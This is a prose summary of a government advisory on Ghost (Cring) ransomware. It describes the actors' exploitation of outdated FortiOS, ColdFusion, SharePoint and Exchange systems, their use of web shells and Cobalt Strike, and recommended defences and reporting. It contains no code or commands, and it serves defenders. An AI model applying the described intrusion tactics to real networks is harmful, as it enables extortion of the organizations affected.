Ghost actors, based in China, have indiscriminately targeted networks with outdated software across over 70 countries, affecting a range of organizations, including critical infrastructure entities, educational institutions, healthcare services, and various businesses. Their approach involves exploiting known vulnerabilities in public-facing applications, particularly through the use of publicly accessible code and unpatched Common Vulnerabilities and Exposures (CVEs).
Their modus operandi includes the deployment of various ransomware payloads, which they continuously rotate and modify, complicating efforts to attribute them. Notable names and file samples associated with the ransomware include Cring.exe and Ghost.exe. Ghost actors have shown a penchant for exploiting weaknesses such as CVS for Fortinet’s FortiOS, Adobe ColdFusion, Microsoft SharePoint, and several vulnerabilities associated with Microsoft Exchange’s ProxyShell attack chain.
Once access is gained, Ghost actors typically upload a web shell, utilizing PowerShell and Windows Command Prompt to execute Cobalt Strike Beacon malware on victim systems. Although they often maintain a short operational period on compromised networks—advancing from initial access to ransomware deployment within a day—their actions can include creating new accounts and modifying existing ones. However, they primarily target immediate financial gain through encryption and ransom demands.
The advisory thoroughly details the various phases through which Ghost actors orchestrate their attacks, including initial access, execution, persistence, privilege escalation, credential access, defense evasion, discovery, lateral movement, exfiltration, command and control, and the impact of their ransomware. For instance, they rely heavily on Cobalt Strike not only for executing commands but also for undermining security protocols, including disabling antivirus software like Windows Defender. Additionally, their strategy for data exfiltration is often minimal, with limited data being sent to controlled servers, thereby reducing the extent of the damage that might be claimed in ransom notes.
For mitigation against Ghost ransomware attacks, organizations are encouraged to implement robust security protocols such as regular system updates, network segmentation, multifactor authentication, user training on phishing awareness, and monitoring for unusual PowerShell usage. Maintaining verified backups is crucial, as organizations with unaffected backups can restore operations without paying ransoms.
The advisory also emphasizes the importance of validating security controls against the MITRE ATT&CK framework to ensure defenses are effective. Reports of incidents should be made to organizations like the FBI’s Internet Crime Complaint Center and local FBI field offices, regardless of whether a ransom is paid. The advisory explicitly warns against paying ransoms, as this may not guarantee recovery of files and could encourage further attacks.
The information contained in the report is intended solely for informational purposes. The FBI, CISA, and MS-ISAC do not endorse any specific products or services mentioned, and organizations are encouraged to assess their cybersecurity posture relative to the Ghost ransomware threat and implement necessary preventive measures.
Enlace de la fuente, haz clic para tener más información